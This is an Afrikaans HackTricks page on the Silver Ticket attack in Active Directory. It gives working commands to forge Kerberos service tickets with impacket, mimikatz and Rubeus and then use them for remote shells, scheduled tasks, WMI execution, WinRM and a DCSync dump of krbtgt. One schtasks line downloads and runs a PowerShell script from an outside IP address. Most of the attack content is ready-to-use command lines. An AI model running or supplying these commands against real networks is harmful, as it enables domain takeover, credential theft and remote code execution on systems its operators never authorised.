Silver Ticket

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

Bug bounty wenk: teken aan vir Intigriti, 'n premium bug bounty platform geskep deur hackers, vir hackers! Sluit by ons aan by https://go.intigriti.com/hacktricks vandag, en begin om belonings te verdien tot $100,000!

Silwermatriek

Die Silwermatriek-aanval behels die uitbuiting van dienskaartjies in Aktiewe Gids (AD) omgewings. Hierdie metode steun op die verkryging van die NTLM-hash van 'n diensrekening, soos 'n rekenaarrekening, om 'n Kaartjieverleningsdiens (TGS) kaartjie te vervals. Met hierdie vervalste kaartjie kan 'n aanvaller toegang verkry tot spesifieke dienste op die netwerk, deur enige gebruiker te simuleer, gewoonlik met die doel om administratiewe voorregte te verkry. Daar word beklemtoon dat die gebruik van AES-sleutels vir die vervalsing van kaartjies meer veilig en minder opspoorbaar is.

Vir kaartjie-vervaardiging word verskillende gereedskap gebruik gebaseer op die bedryfstelsel:

Op Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Op Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Die CIFS-diens word uitgelig as 'n algemene teiken om toegang tot die slagoffer se lêersisteem te verkry, maar ander dienste soos HOST en RPCSS kan ook uitgebuit word vir take en WMI-navrae.

Beskikbare Dienste

Diens Tipe	Diens Silwer Kaartjies
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP Afhanklik van OS ook: WSMAN RPCSS
WinRM	HOST HTTP In sommige gevalle kan jy net vra vir: WINRM
Geskeduleerde Take	HOST
Windows Lêerdeling, ook psexec	CIFS
LDAP-operasies, ingesluit DCSync	LDAP
Windows Remote Server Administration Tools	RPCSS LDAP CIFS
Goue Kaartjies	krbtgt

Diens Tipe

Diens Silwer Kaartjies

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Afhanklik van OS ook:

WSMAN

RPCSS

WinRM

HOST

HTTP

In sommige gevalle kan jy net vra vir: WINRM

Geskeduleerde Take

HOST

Windows Lêerdeling, ook psexec

CIFS

LDAP-operasies, ingesluit DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Goue Kaartjies

krbtgt

Met Rubeus kan jy vir almal hierdie kaartjies vra deur die parameter te gebruik:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silwer kaartjie Gebeurtenis ID's

4624: Rekening Aanmelding
4634: Rekening Afgemeld
4672: Admin Aanmelding

Misbruik van Dienskaartjies

In die volgende voorbeelde, laat ons aanneem dat die kaartjie verkry is deur die administrateurrekening te impersoneer.

CIFS

Met hierdie kaartjie sal jy toegang hê tot die C$ en ADMIN$-vouer via SMB (indien blootgestel) en lêers na 'n deel van die afgeleë lêersisteem kopieer deur iets soos:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

GASHEER

Met hierdie toestemming kan jy geskeduleerde take op afgeleë rekenaars genereer en willekeurige bevele uitvoer:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

GAS + RPCSS

Met hierdie kaartjies kan jy WMI uitvoer in die slagoffer se stelsel:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Vind meer inligting oor wmiexec op die volgende bladsy:

pageWmicExec

GAS + WSMAN (WINRM)

Met winrm-toegang oor 'n rekenaar kan jy daarop toegang kry en selfs 'n PowerShell kry:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

LDAP

Met hierdie voorreg kan jy die DC-databasis dump met behulp van DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Leer meer oor DCSync op die volgende bladsy:

Verwysings

pageDCSync

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

PreviousSID-History Injection NextSkeleton Key

Last updated 1 month ago